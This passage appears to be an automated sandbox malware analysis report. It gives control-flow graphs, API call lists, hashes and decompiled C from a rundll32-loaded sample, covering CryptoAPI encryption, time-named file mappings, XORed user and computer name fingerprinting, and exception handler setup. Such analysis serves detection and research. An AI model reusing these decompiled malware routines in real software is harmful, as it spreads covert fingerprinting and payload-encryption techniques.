                                          • Associated: 00000000.00000002.495944033.0000000000482000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495954473.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495964036.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495981629.0000000000498000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                          • Instruction ID: 3cf9f2388d101d325097f471fc7551e32da9b99bb7f36ef05aa09be99d1535a1
                                          • Opcode Fuzzy Hash: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                          • Instruction Fuzzy Hash: 14E04FB0914204DFDB00EFA8D95975E7BF0AB00308F1580F9D8085B3A1D379DE54EB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 00B6312E Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 b6312e-b63177 RtlInitializeCriticalSection call b61c01 3 b6319f-b631a1 0->3 4 b63179-b6319d memset RtlInitializeCriticalSection 0->4 5 b631a2-b631a8 3->5 4->5 6 b631ae-b631d2 CreateMutexA GetLastError 5->6 7 b635aa-b635b4 5->7 8 b631d4-b631d9 6->8 9 b631ef-b631f1 6->9 10 b631ed 8->10 11 b631db-b631e8 CloseHandle 8->11 12 b631f7-b63202 call b61777 9->12 13 b635a5 9->13 10->9 11->13 14 b635a9 12->14 17 b63208-b63213 call b635f7 12->17 13->14 14->7 17->14 20 b63219-b6322b GetUserNameA 17->20 21 b6324f-b6325f 20->21 22 b6322d-b63245 RtlAllocateHeap 20->22 24 b63261-b63266 21->24 25 b63268-b63285 NtQueryInformationProcess 21->25 22->21 23 b63247-b6324d GetUserNameA 22->23 23->21 24->25 26 b632af-b632b9 24->26 27 b63287 25->27 28 b6328b-b6329a OpenProcess 25->28 29 b632f6-b632fa 26->29 30 b632bb-b632d7 GetShellWindow GetWindowThreadProcessId 26->30 27->28 31 b6329c-b632a1 GetLastError 28->31 32 b632a8-b632a9 CloseHandle 28->32 35 b6330f-b63326 call b6b669 29->35 36 b632fc-b6330c memcpy 29->36 33 b632e9-b632f0 30->33 34 b632d9-b632df 30->34 31->26 37 b632a3 31->37 32->26 33->29 39 b632f2 33->39 34->33 38 b632e1-b632e7 34->38 45 b63333-b63339 35->45 46 b63328-b6332c 35->46 36->35 41 b6333f-b6337b call b67c1e call b56b6a call b69c23 37->41 38->29 39->29 53 b63391-b633a0 call b65f92 41->53 54 b6337d-b6338c CreateEventA call b5c6b8 41->54 45->14 45->41 46->45 48 b6332e call b6cb50 46->48 48->45 53->14 58 b633a6-b633b9 RtlAllocateHeap 53->58 54->53 58->14 59 b633bf-b633df OpenEventA 58->59 60 b63401-b63403 59->60 61 b633e1-b633f0 CreateEventA 59->61 62 b63404-b6342b call b66b34 60->62 61->62 63 b633f2-b633fc GetLastError 61->63 66 b63431-b6343f 62->66 67 b63598-b6359f 62->67 63->14 68 b63445-b6345d call b70a02 66->68 69 b634f1-b634f7 66->69 67->14 68->14 85 b63463-b6346a 68->85 70 b63503-b6350a 69->70 71 b634f9-b634fe call b6567e call b55fc9 69->71 70->13 74 b63510-b63515 70->74 71->70 77 b63517-b6351d 74->77 78 b63571-b63596 call b66b34 74->78 82 b6351f-b63526 SetEvent 77->82 83 b6352c-b63542 RtlAllocateHeap 77->83 78->67 88 b635a1-b635a2 78->88 82->83 86 b63544-b6356b wsprintfA 83->86 87 b6356e-b63570 83->87 89 b6347e-b63492 LoadLibraryA 85->89 90 b6346c-b63478 85->90 86->87 87->78 88->13 91 b63494-b634bc call b51750 89->91 92 b634c1-b634d4 call b54df5 89->92 90->89 91->92 92->14 96 b634da-b634e3 92->96 96->70 97 b634e5-b634ef call b5e084 96->97 97->70
                                          APIs
                                          • RtlInitializeCriticalSection.NTDLL(00B79448), ref: 00B6314C
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B6317D
                                          • RtlInitializeCriticalSection.NTDLL(0614C2D0), ref: 00B6318E
                                            • Part of subcall function 00B61777: RtlInitializeCriticalSection.NTDLL(00B79420), ref: 00B6179B
                                            • Part of subcall function 00B61777: RtlInitializeCriticalSection.NTDLL(00B79400), ref: 00B617B1
                                            • Part of subcall function 00B61777: GetVersion.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617C2
                                            • Part of subcall function 00B61777: GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617F6
                                            • Part of subcall function 00B635F7: RtlAllocateHeap.NTDLL(00000000,-00000003,77D49EB0), ref: 00B63611
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B631B7
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B631C8
                                          • CloseHandle.KERNEL32(000005AC,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B631DC
                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 00B63225
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B63238
                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 00B6324D
                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 00B6327D
                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B63292
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B6329C
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B632A9
                                          • GetShellWindow.USER32 ref: 00B632C4
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B632CB
                                          • memcpy.NTDLL(00B79314,?,00000018,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B63307
                                          • CreateEventA.KERNEL32(00B79208,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B63385
                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 00B633AF
                                          • OpenEventA.KERNEL32(00100000,00000000,0614B9C8,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B633D7
                                          • CreateEventA.KERNEL32(00B79208,00000001,00000000,0614B9C8,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B633EC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B633F2
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B6348A
                                          • SetEvent.KERNEL32(?,00B69CDB,00000000,00000000,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B63520
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00B69CDB), ref: 00B63535
                                          • wsprintfA.USER32 ref: 00B63565
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                          • String ID:
                                          • API String ID: 3929413950-0
                                          • Opcode ID: 605d01f174fb1b32134412552b31ff5ddadcdd4412a9f6309541f361f6a41fa9
                                          • Instruction ID: d0f1fe837dfb3f0a71e8cb099111f56727964186d23549b1c896f1bbe6f8a9c3
                                          • Opcode Fuzzy Hash: 605d01f174fb1b32134412552b31ff5ddadcdd4412a9f6309541f361f6a41fa9
                                          • Instruction Fuzzy Hash: A9C1CFB0504349AFC720EF65EC8892A7BF8FB95B01B5148AEF55ED3260CF399984CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893072 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 187 4893072-48930b2 CryptAcquireContextW 188 4893209-489320f GetLastError 187->188 189 48930b8-48930f4 memcpy CryptImportKey 187->189 192 4893212-4893219 188->192 190 48930fa-489310c CryptSetKeyParam 189->190 191 48931f4-48931fa GetLastError 189->191 193 48931e0-48931e6 GetLastError 190->193 194 4893112-489311b 190->194 195 48931fd-4893207 CryptReleaseContext 191->195 198 48931e9-48931f2 CryptDestroyKey 193->198 196 489311d-489311f 194->196 197 4893123-4893130 call 4894df6 194->197 195->192 196->197 199 4893121 196->199 202 48931d7-48931de 197->202 203 4893136-489313f 197->203 198->195 199->197 202->198 204 4893142-489314a 203->204 205 489314c 204->205 206 489314f-489316c memcpy 204->206 205->206 207 489316e-4893185 CryptEncrypt 206->207 208 4893187-4893196 CryptDecrypt 206->208 209 489319c-489319e 207->209 208->209 210 48931ae-48931b9 GetLastError 209->210 211 48931a0-48931aa 209->211 212 48931bb-48931cb 210->212 213 48931cd-48931d5 call 4894c73 210->213 211->204 214 48931ac 211->214 212->198 213->198 214->212
                                          C-Code - Quality: 58%
                                          			E04893072(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x489a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x489a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04894DF6(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x489a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E04894C73(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                          0x0489307b
                                          0x04893081
                                          0x04893084
                                          0x0489308a
                                          0x0489308a
                                          0x0489308c
                                          0x0489308e
                                          0x04893091
                                          0x04893097
                                          0x04893098
                                          0x04893099
                                          0x0489309f
                                          0x048930a4
                                          0x048930aa
                                          0x048930b2
                                          0x0489320f
                                          0x048930b8
                                          0x048930ba
                                          0x048930c3
                                          0x048930c8
                                          0x048930da
                                          0x048930dd
                                          0x048930e1
                                          0x048930e8
                                          0x048930ec
                                          0x048930f4
                                          0x048931fa
                                          0x048930fa
                                          0x048930fa
                                          0x048930fe
                                          0x048930ff
                                          0x04893101
                                          0x0489310c
                                          0x048931e6
                                          0x04893112
                                          0x04893112
                                          0x04893115
                                          0x0489311b
                                          0x04893121
                                          0x04893121
                                          0x04893129
                                          0x0489312b
                                          0x04893130
                                          0x048931d7
                                          0x04893136
                                          0x0489313c
                                          0x0489313f
                                          0x04893142
                                          0x04893144
                                          0x04893145
                                          0x0489314a
                                          0x0489314c
                                          0x0489314c
                                          0x04893156
                                          0x0489315b
                                          0x0489315e
                                          0x04893161
                                          0x04893163
                                          0x0489316c
                                          0x04893196
                                          0x0489316e
                                          0x0489317f
                                          0x0489317f
                                          0x0489319e
                                          0x00000000
                                          0x00000000
                                          0x048931a0
                                          0x048931a3
                                          0x048931a6
                                          0x048931aa
                                          0x00000000
                                          0x048931ac
                                          0x048931bb
                                          0x048931c1
                                          0x048931c9
                                          0x048931c9
                                          0x00000000
                                          0x048931aa
                                          0x048931ae
                                          0x048931b4
                                          0x048931b9
                                          0x048931d0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048931b9
                                          0x04893130
                                          0x048931e9
                                          0x048931ec
                                          0x048931ec
                                          0x04893201
                                          0x04893201
                                          0x04893219

                                          APIs
                                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,048958B7), ref: 048930AA
                                          • memcpy.NTDLL(?,048958B7,00000010,?,?,?,?,?,?,?,?,?,?,0489564C,00000000,04896D90), ref: 048930C3
                                          • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 048930EC
                                          • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04893104
                                          • memcpy.NTDLL(00000000,04896D90,048958B7,0000011F), ref: 04893156
                                          • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,048958B7,00000020,?,?,0000011F), ref: 0489317F
                                          • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,048958B7,?,?,0000011F), ref: 04893196
                                          • GetLastError.KERNEL32(?,?,0000011F), ref: 048931AE
                                          • GetLastError.KERNEL32 ref: 048931E0
                                          • CryptDestroyKey.ADVAPI32(?), ref: 048931EC
                                          • GetLastError.KERNEL32 ref: 048931F4
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04893201
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0489564C,00000000,04896D90,048958B7,?,048958B7), ref: 04893209
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                          • String ID:
                                          • API String ID: 1967744295-0
                                          • Opcode ID: 7a617e6b48c514a7c229fe36fb246ef009710f177145e35959ae626ae89d9172
                                          • Instruction ID: 23584e4cc53fc11d867ef5b9656953539ab9b41090c25ea78f2c78b767e1f12d
                                          • Opcode Fuzzy Hash: 7a617e6b48c514a7c229fe36fb246ef009710f177145e35959ae626ae89d9172
                                          • Instruction Fuzzy Hash: 46515BB1900608FFDF109FA5DC88AAE7BF9EB48344F084929F915E6250D7759E14DB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04895410 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04895410(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L048981C4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x489a348; // 0x9ad5a8
				_t5 = _t13 + 0x489b87e; // 0x5248e26
				_t6 = _t13 + 0x489b59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04897E2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x489a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x04895410
                                          0x04895418
                                          0x0489541c
                                          0x04895422
                                          0x04895427
                                          0x0489542c
                                          0x0489542f
                                          0x04895432
                                          0x04895437
                                          0x04895438
                                          0x0489543b
                                          0x04895440
                                          0x04895447
                                          0x04895451
                                          0x04895453
                                          0x04895454
                                          0x04895457
                                          0x04895473
                                          0x04895479
                                          0x0489547d
                                          0x048954cb
                                          0x0489547f
                                          0x0489548c
                                          0x0489549c
                                          0x048954a4
                                          0x048954b6
                                          0x048954ba
                                          0x00000000
                                          0x00000000
                                          0x048954a6
                                          0x048954a9
                                          0x048954ae
                                          0x048954b0
                                          0x048954b0
                                          0x0489548e
                                          0x04895490
                                          0x048954bc
                                          0x048954bd
                                          0x048954bd
                                          0x0489548c
                                          0x048954d2

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53,?,?), ref: 0489541C
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04895432
                                          • _snwprintf.NTDLL ref: 04895457
                                          • CreateFileMappingW.KERNELBASE(000000FF,0489A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04895473
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53,?), ref: 04895485
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0489549C
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53), ref: 048954BD
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53,?), ref: 048954C5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 3ab2ac6b030070fbc25495f1fbf552e2abe91e152ce9cffa64e22782d666d346
                                          • Instruction ID: 2d0b1cb652df43cd546ac26b8424563c5df2ac2d035c7716b85af6178d35d3da
                                          • Opcode Fuzzy Hash: 3ab2ac6b030070fbc25495f1fbf552e2abe91e152ce9cffa64e22782d666d346
                                          • Instruction Fuzzy Hash: C221C3B2600A14BBDB11AB68DC05F8E37F9EB84B45F184A24F519E6280EA74AD048B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048912D3 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 351 48912d3-48912e7 352 48912e9-48912ee 351->352 353 48912f1-4891303 call 489333b 351->353 352->353 356 4891305-4891315 GetUserNameW 353->356 357 4891357-4891364 353->357 358 4891366-489137d GetComputerNameW 356->358 359 4891317-4891327 RtlAllocateHeap 356->359 357->358 360 48913bb-48913df 358->360 361 489137f-4891390 RtlAllocateHeap 358->361 359->358 362 4891329-4891336 GetUserNameW 359->362 361->360 363 4891392-489139b GetComputerNameW 361->363 364 4891338-4891344 call 4892087 362->364 365 4891346-4891355 HeapFree 362->365 366 489139d-48913a9 call 4892087 363->366 367 48913ac-48913b5 HeapFree 363->367 364->365 365->358 366->367 367->360
                                          C-Code - Quality: 96%
                                          			E048912D3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x489a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E0489333B( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x489a344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x489a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04892087(_v8 + _v8, _t64);
							}
							HeapFree( *0x489a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x489a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04892087(_v8 + _v8, _t64);
						}
						HeapFree( *0x489a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x048912d3
                                          0x048912db
                                          0x048912df
                                          0x048912e2
                                          0x048912e7
                                          0x048912e9
                                          0x048912ee
                                          0x048912ee
                                          0x048912f4
                                          0x048912f6
                                          0x04891303
                                          0x04891364
                                          0x04891305
                                          0x0489130a
                                          0x04891310
                                          0x04891315
                                          0x04891323
                                          0x04891327
                                          0x04891336
                                          0x0489133d
                                          0x04891344
                                          0x04891344
                                          0x0489134f
                                          0x0489134f
                                          0x04891327
                                          0x04891315
                                          0x04891366
                                          0x0489136c
                                          0x04891376
                                          0x04891378
                                          0x0489137d
                                          0x0489138c
                                          0x04891390
                                          0x0489139b
                                          0x048913a2
                                          0x048913a9
                                          0x048913a9
                                          0x048913b5
                                          0x048913b5
                                          0x04891390
                                          0x048913c0
                                          0x048913c2
                                          0x048913c5
                                          0x048913c7
                                          0x048913ca
                                          0x048913cd
                                          0x048913d7
                                          0x048913db
                                          0x048913df

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0489130A
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04891321
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0489132E
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0489134F
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04891376
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0489138A
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04891397
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 048913B5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 21f06d68ad4d99c298c8cb13b4a5a12bcf3330f147f7b530299b64c556c183e9
                                          • Instruction ID: 34cbf6824bce956f9e898a6103c99ab77c97613e2a66c401388f2b908633ad51
                                          • Opcode Fuzzy Hash: 21f06d68ad4d99c298c8cb13b4a5a12bcf3330f147f7b530299b64c556c183e9
                                          • Instruction Fuzzy Hash: 2E314371604606EFEB14DFA9DC85A6EB7F9FB48300F584969E545D3210EB74ED00AB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5BE55 Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 434 b5be55-b5be67 435 b5be71 434->435 436 b5be69-b5be6f 434->436 437 b5be77-b5be8b call b513c3 435->437 436->437 440 b5bec7-b5bef1 call b712f1 437->440 441 b5be8d-b5be9b StrRChrA 437->441 448 b5bef3-b5bef7 440->448 449 b5bf0f-b5bf17 440->449 442 b5bea0 441->442 443 b5be9d-b5be9e 441->443 445 b5bea6-b5bec1 _strupr lstrlen call b61c16 442->445 443->445 445->440 448->449 453 b5bef9-b5bf04 448->453 450 b5bf1e-b5bf3c CreateEventA 449->450 451 b5bf19-b5bf1c 449->451 456 b5bf70-b5bf76 GetLastError 450->456 457 b5bf3e-b5bf45 call b637c5 450->457 455 b5bf7c-b5bf83 451->455 453->449 454 b5bf06-b5bf0d 453->454 454->449 454->454 460 b5bf85-b5bf8c RtlRemoveVectoredExceptionHandler 455->460 461 b5bf92-b5bf97 455->461 459 b5bf78-b5bf7a 456->459 457->456 463 b5bf47-b5bf4e 457->463 459->455 459->461 460->461 464 b5bf61-b5bf64 call b6312e 463->464 465 b5bf50-b5bf5c RtlAddVectoredExceptionHandler 463->465 467 b5bf69-b5bf6e 464->467 465->464 467->456 467->459
                                          APIs
                                          • StrRChrA.SHLWAPI(0614B5B0,00000000,0000005C,?,?,?), ref: 00B5BE91
                                          • _strupr.NTDLL ref: 00B5BEA7
                                          • lstrlen.KERNEL32(0614B5B0,?,?), ref: 00B5BEAF
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 00B5BF2F
                                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,00B696E0), ref: 00B5BF56
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B5BF70
                                          • RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 00B5BF86
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                          • String ID:
                                          • API String ID: 2251957091-0
